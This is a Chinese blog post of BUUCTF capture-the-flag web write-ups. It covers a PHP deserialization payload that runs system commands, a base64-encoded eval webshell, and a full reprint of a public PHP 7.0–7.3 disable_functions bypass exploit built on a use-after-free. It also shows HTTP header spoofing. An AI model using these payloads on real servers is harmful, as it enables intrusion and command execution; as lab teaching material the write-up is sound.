BUUCTF 21

最新推荐文章于 2021-03-27 10:13:27 发布
最新推荐文章于 2021-03-27 10:13:27 发布
阅读量368 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52431855/article/details/113618071
版权

知识点

  • PHP版本漏洞

  1. php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
    影响范围是linux,php7.0-7.3

  • http字段解释连接

Header解释示例
Accept指定客户端能够接收的内容类型Accept: text/plain, text/html,application/json
Accept-Charset浏览器可以接受的字符编码集。Accept-Charset: iso-8859-5
Accept-Encoding指定浏览器可以支持的web服务器返回内容压缩编码类型。Accept-Encoding: compress, gzip
Accept-Language浏览器可接受的语言Accept-Language: en,zh
Accept-Ranges可以请求网页实体的一个或者多个子范围字段Accept-Ranges: bytes
AuthorizationHTTP授权的授权证书Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
Cache-Control指定请求和响应遵循的缓存机制Cache-Control: no-cache
Connection表示是否需要持久连接。(HTTP 1.1默认进行持久连接)Connection: close
CookieHTTP请求发送时,会把保存在该请求域名下的所有cookie值一起发送给web服务器。Cookie: $Version=1; Skin=new;
Content-Length请求的内容长度Content-Length: 348
Content-Type请求的与实体对应的MIME信息Content-Type: application/x-www-form-urlencoded
Date请求发送的日期和时间Date: Tue, 15 Nov 2010 08:12:31 GMT
Expect请求的特定的服务器行为Expect: 100-continue
From发出请求的用户的EmailFrom: user@email.com
Host指定请求的服务器的域名和端口号Host: www.zcmhi.com
If-Match只有请求内容与实体相匹配才有效If-Match: “737060cd8c284d8af7ad3082f209582d”
If-Modified-Since如果请求的部分在指定时间之后被修改则请求成功,未被修改则返回304代码If-Modified-Since: Sat, 29 Oct 2010 19:43:31 GMT
If-None-Match如果内容未改变返回304代码,参数为服务器先前发送的Etag,与服务器回应的Etag比较判断是否改变If-None-Match: “737060cd8c284d8af7ad3082f209582d”
If-Range如果实体未改变,服务器发送客户端丢失的部分,否则发送整个实体。参数也为EtagIf-Range: “737060cd8c284d8af7ad3082f209582d”
If-Unmodified-Since只在实体在指定时间之后未被修改才请求成功If-Unmodified-Since: Sat, 29 Oct 2010 19:43:31 GMT
Max-Forwards限制信息通过代理和网关传送的时间Max-Forwards: 10
Pragma用来包含实现特定的指令Pragma: no-cache
Proxy-Authorization连接到代理的授权证书Proxy-Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
Range只请求实体的一部分,指定范围Range: bytes=500-999
Referer先前网页的地址,当前请求网页紧随其后,即来路Referer: http://www.zcmhi.com/archives…
TE客户端愿意接受的传输编码,并通知服务器接受接受尾加头信息TE: trailers,deflate;q=0.5
Upgrade向服务器指定某种传输协议以便服务器进行转换(如果支持)Upgrade: HTTP/2.0, SHTTP/1.3, IRC/6.9, RTA/x11
User-AgentUser-Agent的内容包含发出请求的用户信息User-Agent: Mozilla/5.0 (Linux; X11)
Via通知中间网关或代理服务器地址,通信协议Via: 1.0 fred, 1.1 nowhere.com (Apache/1.1)
Warning关于消息实体的警告信息Warn: 199 Miscellaneous warning

借鉴地址: https://www.cnblogs.com/benbenfishfish/p/5821091.html

21-1 [网鼎杯 2020 朱雀组]phpweb

做题思路

发现有时间显示,抓包分析

我们发现func参数调用了函数date(),p参数调用了函数date中填写的时间格式,我们尝试构造一下,查看能否代码执行,首先尝试读取index.php的文件

构造语句

func=readfile&p=index.php

成功读取源码

<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
    }else {
        die("Hacker...");
    }
}
?>

审计一下代码,发现过滤了很多函数,但是不影响我们读取文件,同时我们发现,存在魔法函数,我们也可以通过构造反序列化代码,来达到绕过黑名单,执行system等函数的目的,尝试目录穿越读取文件

反序列化,构造exp。

<?php
class Test {
    var $p = "ls";
    var $func = "system";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}

$a=new Test();
echo serialize($a);


但是找不到flag在哪。构造exp。
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

图片.png

于是直接读取flag

 

21-2 [GKCTF2020]CheckIN

做题思路

    审计代码发现有一个@eval,想到了一句话

首先传参phpinfo();看看,需要经过base64编码

?Ginkgo=cGhwaW5mbygpOw==

ctrl+f 搜索 disable_functions,发现禁用了system,exec,shell_exec,ls等 但是没有禁用 file_get_contents fopen 甚至eval等函数

于是我们上传一个一句话木马试试

eval($_POST[123]);
经过base64是ZXZhbCgkX1BPU1RbMTIzXSk7

然后用蚁剑连接

可以看到flag和readflag;
权限不够无法打开flag,readflag打开也是一堆乱码。
这种情况一般就是通过执行readflag来获取flag。
接下来就要结合7.3版本,readflag,想到
bypass disable_functions,该漏洞可以触发命令执行
大佬给出的exp:

https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

<?php

# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=72530
#
# This exploit should work on all PHP 7.0-7.3 versions
#
# Author: https://github.com/mm0r1

pwn("/readflag");

function pwn($cmd) {
    global $abc, $helper;

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                # handle pie
                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                # 'constant' constant check
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                # 'bin2hex' constant check
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) { # ELF header
                return $addr;
            }
        }
    }

    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) { # system
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    class ryat {
        var $ryat;
        var $chtg;
        
        function __destruct()
        {
            $this->chtg = $this->ryat;
            $this->ryat = 1;
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; # increase this value if you get segfaults

    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_repeat('A', 79);

    $poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';
    $out = unserialize($poc);
    gc_collect_cycles();

    $v = [];
    $v[0] = ptr2str(0, 79);
    unset($v);
    $abc = $out[2][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }

    # leaks
    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    # fake value
    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    # fake reference
    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }

    # fake closure object
    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    # pwn
    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); # internal func type
    write($abc, 0xd0 + 0x68, $zif_system); # internal func handler

    ($helper->b)($cmd);

    exit();
}

修改一下exp的执行目标,通过蚁剑上传至tmp目录下(因为这目录的权限较高)

上传成功后在页面里包含文件即可获得flag,

?Ginkgo=include(’/tmp/test.php’);
Base64后?Ginkgo=aW5jbHVkZSgnL3RtcC90ZXN0LnBocCcpOw==

21-3 [BJDCTF 2nd]假猪套天下第一

做题思路

打开之后 

尝试登陆一下,没成功

查看源码之后也没啥提示,找WP

发现 随便输入一个账号登录,登陆成功

我太呆    然后抓包发现 L0g1n.php ,

访问之后显示 

抓包之后发现cookie里面有个time修改一个大数字之后得到

于是得到 

然后添加X-Forwarded-For: 127.0.0.1 

由WP得知 还可以使用 Client-ip: 127.0.0.1 

提示需要从这个网站访问,接着便添加一个Referer: gem-love.com 

提示修改浏览器,于是修改User-Agent: Commodo 64 

百度得知真正的名字为 Commodore 64,继续修改得到

添加From: root@gem-love.com 

提示使用提供的代理地址添加Via: y1ng.vip 

base64解码后得到 flag{78f5acb5-1c59-4430-b8f9-e25f65866896}

 

小杌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php漏洞整理
devil8123665的博客
11-25 667
1、php7-gc-bypass exp:https://github.com/devil8123665/exploits/blob/master/php7-gc-bypass/exploit.php 题目:[GKCTF2020]CheckIN wp:https://blog.csdn.net/m0_46230316/article/details/106477417 2、phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞 题目:[GWCTF 2019]我有一个数据库 wp
php7反序列化问题,PHP7:反序列化漏洞案例及分析
weixin_42364609的博客
03-23 394
在典型的PHP-5反序列化利用中,我们会使用分配器来覆盖一个指向字符串内容的指针,从而阅读下一个堆slot的内容。然而在PHP-7中,内部字符串的表示是截然不同的。在PHP-7中, 基本结构structzval在内部指向结构zend_string,从而引用字符串。zend_string转而使用member数组,将字符串嵌入到结构的末尾。因此,直接指向字符串内容的指针不可以被覆盖。然而,PHP-5的...
开始php脚本,php bypass disable function
weixin_42393261的博客
03-21 436
前言最近开学,事太多了,好久没更新了,然后稍微闲一点一直在弄这个php bypass disable function,一开始自己的电脑win10安装蚁剑的插件,一直报错。怀疑是必须linux环境。下载github上官方源码又显示压缩包有问题,被搞了几天,心态爆炸。今天登github上下载又莫名其妙可以压缩了。装在虚拟机里,总算可以用了。Bypass Disable Functions 专题什么是...
php7 漏洞,PHP中危拒绝服务漏洞(CVE-2017-8923)
weixin_29383429的博客
03-11 1141
PHP是使用比较广泛的通用目的脚本语言,特别是现在的网站程序的开发,并且可以嵌入到HTML代码当中。近日,百度安全指数官网发布了一篇关于PHP拒绝服务的漏洞报告(CVE-2017-8923),今天小凯seo博客转载过来和朋友们分享一下,具体内容如下:PHP(外文名:PHP: Hypertext Preprocessor,中文名:“超文本预处理器”)是一种通用开源脚本语言。语法吸收了C语言、Java...
[GKCTF2020]CheckIN bypass_php7_disable_functions
偷一个月亮
09-01 450
[GKCTF2020]CheckIN <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = ...
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF部分web题目
最新发布
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
PHP5.5 ~ PHP7.2 新特性整理
weixin_34268843的博客
03-30 404
PHP5.5 ~ PHP7.2 新特性整理 官方文档:http://php.net/manual/zh/appe... 一、从PHP 5.5.x 移植到 PHP 5.6.x 使用表达式定义常量 在之前的 PHP 版本中, 必须使用静态值来定义常量,声明属性以及指定函数参数默认值。 现在你可以使用包括数值、字符串字面量以及其他常量在内的数...
php7 垃圾回收机制
热门推荐
徐小鹏的博客
09-02 1万+
不特意说明的话 php 版本为 7.2 明天再写,先列个大纲 zval的结构 变量的回收 循环引用造成的内存泄漏 object和array的回收 参考链接: 官方文档 盘古大叔内核剖析之GC 鸟哥的 zval 解析 哈希表...
第一届BMZCTF公开赛-WEB-Writeup
末初的CSDN博客
12-30 3909
文章目录ezevalezphppenetrationBMZ_Market 前言 首先恭喜白帽子社区团队成功举办第一届BMZCTF公开赛,我是本次比赛MISC赛题Snake、Tiga的出题人末初 以下是我对于的这次BMZCTF公开赛的WEB赛题的一些Writeup,如果有什么写的不对的还请师傅们留言斧正 ezeval <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_li
php-fpm+nginx+php7命令执行漏洞复现过程记录
win176489的博客
11-08 2415
php-fpm+nginx+php7命令执行漏洞复现 受影响的版本php7.0~php7.3 漏洞环境搭建 漏洞靶机ubuntu16.04 docker环境 攻击机kali go环境 过程 一.搭建docker环境 可参考这个大神的搭建过程 https://blog.csdn.net/jinking01/article/details/82490688 二.下载漏洞环境 地址 https:...
php+gd+漏洞+7.0.20,论PHP常见的漏洞 | WooYun知识库
weixin_39958138的博客
03-09 695
首先拿到一份源码 肯定是先install上。 而在安装文件上又会经常出现问题。一般的安装文件在安装完成后 基本上都不会自动删除这个安装的文件 我遇到过的会自动删除的好像也就qibocms了。其他的基本都是通过生成一个lock文件 来判断程序是否安装过了 如果存在这个lock文件了 就会退出了。 这里首先 先来说一下安装文件经常出现的问题。根本无验证。这种的虽然不多 但是有时还是会遇到个。 在安装完...
php漏洞几十个,【漏洞预警】PHP7被发现三个0day漏洞,其中一个还
weixin_36123682的博客
03-26 1814
Check Point的安全性研究者在PHP7上发觉了3个比较严重0day系统漏洞,而且在其中还有一个0day未被恢复。假如这种系统漏洞被攻击者取得成功利用不良影响十分比较严重,可造成 全世界80%的网址被攻击者良好控制。PHP介绍PHP是一种通用性开源系统脚本制作预言,消化吸收了C预言、Java和Perl的特性,更非常容易被开发人员学习培训应用。用PHP作出的动态性网页页面与别的的计算机语言对比...
php7.2.0 漏洞,N/A Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution-漏洞情报...
weixin_39758392的博客
03-27 609
// Source: http://akat1.pl/?id=1function get_maps() {$fh = fopen("/proc/self/maps", "r");$maps = fread($fh, 331337);fclose($fh);return explode("\n", $maps);}function find_map($sym) {$addr = 0;foreach(...
PHP7曝出三个高危0-day漏洞,还有一个仍未修复
weixin_34024034的博客
08-01 1164
PHP7出现三个高危0-day漏洞,可允许攻击者完全控制PHP网站。 这三个漏洞出现在PHP7的反序列化机制中,而PHP5的反序列机制也曾曝出漏洞,在过去几年中,黑客利用该漏洞将恶意代码编入客户机cookie并发送,从而入侵了Drupal、Joomla、Magento、vBulletin和PornHub等网站。 漏洞概况 最近,Check Point...
PHP7.x的 PHP-FPM 存在远程代码执行漏洞
kuzina111的博客
10-29 4136
据外媒 ZDNet 的报道,PHP 7.x 中最近修复的一个远程代码执行漏洞正被恶意利用,并会导致攻击者控制服务器。编号为CVE-2019-11043的漏洞允许攻击者通过向目标服务器发送特制的 URL,即可在存在漏洞的服务器上执行命令。漏洞利用的PoC代码也已在 GitHub 上发布。 一旦确定了易受攻击的目标,攻击者便可以通过在URL 中附加'?a=' 以发送特制请求到易受攻...
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值